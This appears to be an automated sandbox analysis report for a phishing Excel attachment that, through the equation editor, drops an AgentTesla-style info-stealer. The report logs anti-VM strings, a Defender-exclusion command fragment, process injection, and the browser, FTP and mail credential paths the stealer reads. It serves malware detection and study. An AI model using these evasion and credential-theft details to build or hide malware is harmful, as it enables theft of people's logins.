Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DA1E28	4_2_00DA1E28
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DB2050	5_2_00DB2050
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00456048	5_2_00456048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00455430	5_2_00455430
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00455778	5_2_00455778
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004599A8	5_2_004599A8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0045E9A8	5_2_0045E9A8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0045C1F8	5_2_0045C1F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00452198	5_2_00452198
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0045E3F8	5_2_0045E3F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0045D6F9	5_2_0045D6F9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0045D758	5_2_0045D758
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00680108	5_2_00680108
Source: C:\Users\Public\vbc.exe	Code function: 5_2_006831D0	5_2_006831D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00684260	5_2_00684260
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00687648	5_2_00687648
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0068CA28	5_2_0068CA28
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0068AAB0	5_2_0068AAB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AC0048	5_2_00AC0048

Source: New Order for April#89032.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: hkn[1].exe.2.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: hkn[1].exe.2.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/18@1/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$New Order for April#89032.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR157.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);

Source: New Order for April#89032.xlsx

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: New Order for April#89032.xlsx

Static file information: File size 2269696 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: New Order for April#89032.xlsx

Initial sample: OLE indicators vbamacros = False

Source: New Order for April#89032.xlsx

Initial sample: OLE indicators encrypted = True

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DC858F push dword ptr [esi+3Fh]; iretd	4_2_00DC85A1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DC92FB push FFFFFFD9h; iretd	4_2_00DC9318
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00536E00 pushad ; iretd	4_2_00536E01
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DC858F push dword ptr [esi+3Fh]; iretd	5_2_00DC85A1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DC92FB push FFFFFFD9h; iretd	5_2_00DC9318

Source: initial sample

Static PE information: section name: .text entropy: 7.54549317516

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: New Order for April#89032.xlsx

Stream path 'EncryptedPackage' entropy: 7.9999090543 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\Public\vbc.exe

Window / User API: threadDelayed 9672

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2556	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2724	Thread sleep time: -103949s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1684	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2688	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2960	Thread sleep time: -480000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1900	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1900	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1336	Thread sleep count: 9672 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1336	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1900	Thread sleep count: 102 > 30	Jump to behavior

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 103949	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: New Order for April#89032.xlsx	Binary or memory string: u<qEmu
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior

Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.3446ec0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3446ec0.3.raw.unpack, type: UNPACKEDPE

Yara detected Telegram RAT

Show sources

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.3446ec0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3446ec0.3.raw.unpack, type: UNPACKEDPE

Yara detected Telegram RAT

Show sources

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Path Interception	Extra Window Memory Injection1	Disable or Modify Tools1	OS Credential Dumping2	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Web Service1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Process Injection112	Obfuscated Files or Information31	Credentials in Registry1	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing2	Security Account Manager	Security Software Discovery311	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Encrypted Channel12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Extra Window Memory Injection1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
